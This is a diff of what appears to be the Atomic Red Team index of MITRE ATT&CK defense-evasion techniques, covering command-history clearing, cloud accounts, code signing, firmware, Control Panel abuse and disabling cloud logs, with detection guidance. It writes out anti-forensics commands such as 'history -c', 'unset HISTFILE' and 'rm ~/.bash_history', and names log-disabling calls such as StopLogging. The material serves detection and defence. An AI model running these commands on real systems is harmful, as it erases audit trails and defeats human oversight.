+ On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions.
- Adversaries can use a variety of methods to prevent their own commands from appear in these logs, such as clearing the history environment variable (unset HISTFILE), setting the command history size to zero (export HISTFILESIZE=0), manually clearing the history (history -c), or deleting the bash history file rm ~/.bash_history.
+ Adversaries may delete their commands from these logs by manually clearing the history (history -c) or deleting the bash history file rm ~/.bash_history.
+
+ On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.
+
+ The PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)
+
+ Adversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt file. Adversaries may also delete the ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)
id: attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T21:31:03.043Z'
+ modified: '2020-10-16T18:09:48.686Z'
created: '2020-01-31T12:32:08.228Z'
- x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Vikas Singh, Sophos
+ - Emile Kenning, Sophos
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- User
x_mitre_defense_bypassed:
- Host forensic analysis
- Log analysis
- x_mitre_detection: User authentication, especially via remote terminal services
- like SSH, without new entries in that user's ~/.bash_history
- is suspicious. Additionally, the modification of the HISTFILE
- and HISTFILESIZE environment variables or the removal/clearing
- of the ~/.bash_history file are indicators of suspicious activity.
+ x_mitre_detection: |-
+ User authentication, especially via remote terminal services like SSH, without new entries in that user's ~/.bash_history is suspicious. Additionally, the removal/clearing of the ~/.bash_history file can be an indicator of suspicious activity.
+
+ Monitor for suspicious modifications or deletion of ConsoleHost_history.txt and use of the Clear-History command.
x_mitre_data_sources:
+ - Process command-line parameters
+ - PowerShell logs
- File monitoring
- Authentication logs
x_mitre_platforms:
- Linux
- macOS
+ - Windows
identifier: T1070.003
atomic_tests:
- name: Clear Bash history (rm)
@@ -23202,6 +26847,15 @@ defense-evasion:
elevation_required: true
T1078.004:
technique:
+ id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65
+ description: |-
+ Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)
+
+ Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.
+ name: Cloud Accounts
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1078.004
@@ -23218,15 +26872,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
description: Microsoft. (n.d.). Deploying Active Directory Federation Services
in Azure. Retrieved March 13, 2020.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Cloud Accounts
- description: |-
- Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory.(Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)
-
- Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.
- id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -23237,21 +26882,8 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-23T21:59:36.729Z'
+ modified: '2020-10-19T16:01:22.090Z'
created: '2020-03-13T20:36:57.378Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_detection: Perform regular audits of cloud accounts to detect abnormal
- or malicious activity, such as accessing information outside of the normal
- function of the account or account usage at atypical hours.
- x_mitre_data_sources:
- - Azure activity logs
- - Authentication logs
- - AWS CloudTrail logs
- - Stackdriver logs
x_mitre_platforms:
- AWS
- GCP
@@ -23259,32 +26891,22 @@ defense-evasion:
- SaaS
- Azure AD
- Office 365
+ x_mitre_data_sources:
+ - Azure activity logs
+ - Authentication logs
+ - AWS CloudTrail logs
+ - Stackdriver logs
+ x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
+ or malicious behavior, such as accessing information outside of the normal
+ function of the account or account usage at atypical hours.
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.1'
atomic_tests: []
T1553.002:
technique:
- created: '2020-02-05T16:27:37.784Z'
- modified: '2020-02-10T19:51:01.601Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- type: attack-pattern
- id: attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082
- description: "Adversaries may create, acquire, or steal code signing materials
- to sign their malware or tools. Code signing provides a level of authenticity
- on a binary from the developer and a guarantee that the binary has not been
- tampered with. (Citation: Wikipedia Code Signing) The certificates used during
- an operation may be created, acquired, or stolen by the adversary. (Citation:
- Securelist Digital Certificates) (Citation: Symantec Digital Certificates)
- Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001),
- this activity will result in a valid signature.\n\nCode signing to verify
- software on first run can be used on modern Windows and macOS/OS X systems.
- It is not used on Linux due to the decentralized nature of the platform. (Citation:
- Wikipedia Code Signing) \n\nCode signing certificates may be used to bypass
- security policies that require signed code to execute on a system. "
- name: Code Signing
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1553.002
@@ -23301,18 +26923,41 @@ defense-evasion:
description: Shinotsuka, H. (2013, February 22). How Attackers Steal Private
Keys from Digital Certificates. Retrieved March 31, 2016.
source_name: Symantec Digital Certificates
- x_mitre_platforms:
- - macOS
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Code Signing
+ description: "Adversaries may create, acquire, or steal code signing materials
+ to sign their malware or tools. Code signing provides a level of authenticity
+ on a binary from the developer and a guarantee that the binary has not been
+ tampered with. (Citation: Wikipedia Code Signing) The certificates used during
+ an operation may be created, acquired, or stolen by the adversary. (Citation:
+ Securelist Digital Certificates) (Citation: Symantec Digital Certificates)
+ Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001),
+ this activity will result in a valid signature.\n\nCode signing to verify
+ software on first run can be used on modern Windows and macOS/OS X systems.
+ It is not used on Linux due to the decentralized nature of the platform. (Citation:
+ Wikipedia Code Signing) \n\nCode signing certificates may be used to bypass
+ security policies that require signed code to execute on a system. "
+ id: attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-02-10T19:51:01.601Z'
+ created: '2020-02-05T16:27:37.784Z'
+ x_mitre_data_sources:
+ - Binary file metadata
+ x_mitre_defense_bypassed:
+ - Windows User Account Control
x_mitre_detection: Collect and analyze signing certificate metadata on software
that executes within the environment to look for unusual certificate characteristics
and outliers.
- x_mitre_defense_bypassed:
- - Windows User Account Control
- x_mitre_data_sources:
- - Binary file metadata
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Windows
atomic_tests: []
T1027.004:
technique:
@@ -23723,6 +27368,23 @@ defense-evasion:
name: powershell
T1542.002:
technique:
+ created: '2019-12-19T20:21:21.669Z'
+ modified: '2020-03-23T23:48:33.904Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--791481f8-e96a-41be-b089-a088763083d4
+ description: |-
+ Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
+
+ Malicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.
+ name: Component Firmware
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1542.002
@@ -23738,54 +27400,39 @@ defense-evasion:
health and make sure it's not already dying on you. Retrieved October 2,
2018.
source_name: ITWorld Hard Disk Health Dec 2014
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Component Firmware
- description: |-
- Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
-
- Malicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.
- id: attack-pattern--791481f8-e96a-41be-b089-a088763083d4
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-23T23:48:33.904Z'
- created: '2019-12-19T20:21:21.669Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_system_requirements:
- - Ability to update component device firmware from the host operating system.
- x_mitre_permissions_required:
- - SYSTEM
- x_mitre_defense_bypassed:
- - Anti-virus
- - Host intrusion prevention systems
- - File monitoring
- x_mitre_detection: |-
- Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.
-
- Disk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.
+ x_mitre_platforms:
+ - Windows
x_mitre_data_sources:
- Component firmware
- Process monitoring
- Disk forensics
- API monitoring
- x_mitre_platforms:
- - Windows
+ x_mitre_detection: |-
+ Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.
+
+ Disk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host intrusion prevention systems
+ - File monitoring
+ x_mitre_permissions_required:
+ - SYSTEM
+ x_mitre_system_requirements:
+ - Ability to update component device firmware from the host operating system.
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
atomic_tests: []
T1218.002:
technique:
id: attack-pattern--4ff5d6a8-c062-4c68-a778-36fc5edd564f
description: |-
- Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013)
+ Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
- For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. (Citation: Microsoft Implementing CPL)
+ Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013)
- Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware. (Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.
+ Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.
+
+ Adversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls. Even when these registered DLLs do not comply with the CPL file specification and do not export CPlApplet functions, they are loaded and executed through its DllEntryPoint when Control Panel is executed. CPL files not exporting CPlApplet are not directly executable.(Citation: ESET InvisiMole June 2020)
name: Control Panel
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
object_marking_refs:
@@ -23794,10 +27441,10 @@ defense-evasion:
- source_name: mitre-attack
external_id: T1218.002
url: https://attack.mitre.org/techniques/T1218/002
- - url: https://msdn.microsoft.com/library/windows/desktop/cc144185.aspx
+ - source_name: Microsoft Implementing CPL
description: M. (n.d.). Implementing Control Panel Items. Retrieved January
18, 2018.
- source_name: Microsoft Implementing CPL
+ url: https://msdn.microsoft.com/library/windows/desktop/cc144185.aspx
- url: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
description: Mercês, F. (2014, January 27). CPL Malware - Malicious Control
Panel Items. Retrieved January 18, 2018.
@@ -23810,12 +27457,18 @@ defense-evasion:
description: Grunzweig, J. and Miller-Osborn, J. (2017, November 10). New
Malware with Ties to SunOrcal Discovered. Retrieved November 16, 2017.
source_name: Palo Alto Reaver Nov 2017
+ - source_name: ESET InvisiMole June 2020
+ url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+ description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+ HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-20T22:33:18.929Z'
+ modified: '2020-10-21T18:37:11.672Z'
created: '2020-01-23T19:59:52.630Z'
+ x_mitre_contributors:
+ - ESET
x_mitre_platforms:
- Windows
x_mitre_data_sources:
@@ -23826,15 +27479,15 @@ defense-evasion:
- Binary file metadata
- API monitoring
x_mitre_detection: |-
- Monitor and analyze activity related to items associated with CPL files, such as the control.exe and the Control_RunDLL and ControlRunDLLAsUser API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: control.exe file.cpl) before [Rundll32](https://attack.mitre.org/techniques/T1218/011) is used to call the CPL's API functions (ex: rundll32.exe shell32.dll,Control_RunDLL file.cpl). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1218/011) command, which may bypass detections and/or execution filters for control.exe. (Citation: TrendMicro CPL Malware Jan 2014)
+ Monitor and analyze activity related to items associated with CPL files, such as the control.exe and the Control_RunDLL and ControlRunDLLAsUser API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: control.exe file.cpl) before [Rundll32](https://attack.mitre.org/techniques/T1218/011) is used to call the CPL's API functions (ex: rundll32.exe shell32.dll,Control_RunDLL file.cpl). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1218/011) command, which may bypass detections and/or execution filters for control.exe.(Citation: TrendMicro CPL Malware Jan 2014)
Inventory Control Panel items to locate unregistered and potentially malicious files present on systems:
* Executable format registered Control Panel items will have a globally unique identifier (GUID) and registration Registry entries in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace and HKEY_CLASSES_ROOT\CLSID\{GUID}. These entries may contain information about the Control Panel item such as its display name, path to the local file, and the command executed when opened in the Control Panel. (Citation: Microsoft Implementing CPL)
- * CPL format registered Control Panel items stored in the System32 directory are automatically shown in the Control Panel. Other Control Panel items will have registration entries in the Cpls and Extended Properties Registry keys of HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Control Panel. These entries may include information such as a GUID, path to the local file, and a canonical name used to launch the file programmatically ( WinExec("c:\windows\system32\control.exe {Canonical_Name}", SW_NORMAL);) or from a command line (control.exe /name {Canonical_Name}). (Citation: Microsoft Implementing CPL)
- * Some Control Panel items are extensible via Shell extensions registered in HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Controls Folder\{name}\Shellex\PropertySheetHandlers where {name} is the predefined name of the system item. (Citation: Microsoft Implementing CPL)
+ * CPL format registered Control Panel items stored in the System32 directory are automatically shown in the Control Panel. Other Control Panel items will have registration entries in the CPLs and Extended Properties Registry keys of HKEY_LOCAL_MACHINE or HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Control Panel. These entries may include information such as a GUID, path to the local file, and a canonical name used to launch the file programmatically ( WinExec("c:\windows\system32\control.exe {Canonical_Name}", SW_NORMAL);) or from a command line (control.exe /name {Canonical_Name}).(Citation: Microsoft Implementing CPL)
+ * Some Control Panel items are extensible via Shell extensions registered in HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Controls Folder\{name}\Shellex\PropertySheetHandlers where {name} is the predefined name of the system item.(Citation: Microsoft Implementing CPL)
- Analyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques. (Citation: TrendMicro CPL Malware Jan 2014)
+ Analyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques.(Citation: TrendMicro CPL Malware Jan 2014)
x_mitre_defense_bypassed:
- Application control
x_mitre_permissions_required:
@@ -23842,7 +27495,7 @@ defense-evasion:
- Administrator
- SYSTEM
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
identifier: T1218.002
atomic_tests:
- name: Control Panel Items
@@ -23890,8 +27543,8 @@ defense-evasion:
url: https://attack.mitre.org/techniques/T1578/002
- source_name: Mandiant M-Trends 2020
url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved
- April 24, 2020.
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
- source_name: AWS CloudTrail Search
url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
@@ -23907,7 +27560,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-18T11:45:36.417Z'
+ modified: '2020-09-14T19:48:08.299Z'
created: '2020-05-14T14:45:15.978Z'
x_mitre_platforms:
- AWS
@@ -23984,8 +27637,8 @@ defense-evasion:
url: https://attack.mitre.org/techniques/T1578/001
- source_name: Mandiant M-Trends 2020
url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved
- April 24, 2020.
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
- source_name: AWS Cloud Trail Backup API
url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
@@ -24014,7 +27667,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-19T14:45:59.618Z'
+ modified: '2020-09-14T19:48:08.293Z'
created: '2020-06-09T15:33:13.563Z'
x_mitre_version: '1.0'
x_mitre_is_subtechnique: true
@@ -24142,9 +27795,9 @@ defense-evasion:
- source_name: mitre-attack
external_id: T1574.002
url: https://attack.mitre.org/techniques/T1574/002
- - external_id: CAPEC-capec
+ - external_id: CAPEC-641
source_name: capec
- url: https://capec.mitre.org/data/definitions/capec.html
+ url: https://capec.mitre.org/data/definitions/641.html
- source_name: About Side by Side Assemblies
url: https://docs.microsoft.com/en-us/windows/win32/sbscs/about-side-by-side-assemblies-
description: Microsoft. (2018, May 31). About Side-by-Side Assemblies. Retrieved
@@ -24172,7 +27825,7 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-20T22:05:42.513Z'
+ modified: '2020-10-17T15:15:27.807Z'
created: '2020-03-13T19:41:37.908Z'
x_mitre_defense_bypassed:
- Anti-virus
@@ -24231,6 +27884,9 @@ defense-evasion:
- source_name: mitre-attack
external_id: T1078.001
url: https://attack.mitre.org/techniques/T1078/001
+ - external_id: CAPEC-70
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/70.html
- source_name: Microsoft Local Accounts Feb 2019
url: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts
description: Microsoft. (2018, December 9). Local Accounts. Retrieved February
@@ -24257,9 +27913,9 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-23T21:37:34.567Z'
+ modified: '2020-09-16T19:41:43.491Z'
created: '2020-03-13T20:15:31.974Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- Administrator
@@ -24316,8 +27972,8 @@ defense-evasion:
url: https://attack.mitre.org/techniques/T1578/003
- source_name: Mandiant M-Trends 2020
url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved
- April 24, 2020.
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
- source_name: AWS CloudTrail Search
url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
@@ -24342,7 +27998,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-17T19:53:14.784Z'
+ modified: '2020-09-14T19:55:23.113Z'
created: '2020-06-16T17:23:06.508Z'
x_mitre_detection: |-
The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
@@ -24541,6 +28197,115 @@ defense-evasion:
Format-Hex -InputObject $buffer
name: powershell
elevation_required: true
+ T1562.008:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1562.008
+ url: https://attack.mitre.org/techniques/T1562/008
+ - source_name: 'Following the CloudTrail: Generating strong AWS security signals
+ with Sumo Logic'
+ url: https://expel.io/blog/following-cloudtrail-generating-aws-security-signals-sumo-logic/
+ description: 'Dan Whalen. (2019, September 10). Following the CloudTrail:
+ Generating strong AWS security signals with Sumo Logic. Retrieved October
+ 16, 2020.'
+ - source_name: Stopping CloudTrail from Sending Events to CloudWatch Logs
+ url: https://docs.aws.amazon.com/awscloudtrail/latest/userguide/stop-cloudtrail-from-sending-events-to-cloudwatch-logs.html
+ description: Amazon Web Services. (n.d.). Stopping CloudTrail from Sending
+ Events to CloudWatch Logs. Retrieved October 16, 2020.
+ - source_name: Configuring Data Access audit logs
+ url: https://cloud.google.com/logging/docs/audit/configure-data-access
+ description: Google. (n.d.). Configuring Data Access audit logs. Retrieved
+ October 16, 2020.
+ - source_name: az monitor diagnostic-settings
+ url: https://docs.microsoft.com/en-us/cli/azure/monitor/diagnostic-settings?view=azure-cli-latest#az_monitor_diagnostic_settings_delete
+ description: Microsoft. (n.d.). az monitor diagnostic-settings. Retrieved
+ October 16, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Disable Cloud Logs
+ description: "An adversary may disable cloud logging capabilities and integrations
+ to limit what data is collected on their activities and avoid detection. \n\nCloud
+ environments allow for collection and analysis of audit and application logs
+ that provide insight into what activities a user does within the environment.
+ If an attacker has sufficient permissions, they can disable logging to avoid
+ detection of their activities. For example, in AWS an adversary may disable
+ CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation:
+ Following the CloudTrail: Generating strong AWS security signals with Sumo
+ Logic)"
+ id: attack-pattern--cacc40da-4c9e-462c-80d5-fd70a178b12d
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-10-19T16:31:34.489Z'
+ created: '2020-10-12T13:52:32.846Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: 'Monitor logs for API calls to disable logging. In AWS, monitor
+ for: StopLogging and DeleteTrail.(Citation: Stopping
+ CloudTrail from Sending Events to CloudWatch Logs) In GCP, monitor for: google.logging.v2.ConfigServiceV2.UpdateSink.(Citation:
+ Configuring Data Access audit logs) In Azure, monitor for az monitor
+ diagnostic-settings delete.(Citation: az monitor diagnostic-settings)
+ Additionally, a sudden loss of a log source may indicate that it has been
+ disabled.'
+ x_mitre_data_sources:
+ - AWS CloudTrail logs
+ - Azure activity logs
+ - GCP audit logs
+ x_mitre_contributors:
+ - Ibrahim Ali Khan
+ - AttackIQ
+ - Janantha Marasinghe
+ - 'Sekhar Sarukkai; Prasad Somasamudram; Syed Ummar Farooqh (McAfee) '
+ - Matt Snyder, VMware
+ x_mitre_platforms:
+ - GCP
+ - Azure
+ - AWS
+ atomic_tests: []
+ T1600.002:
+ technique:
+ id: attack-pattern--7efba77e-3bc4-4ca5-8292-d8201dcd64b5
+ description: |-
+ Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
+
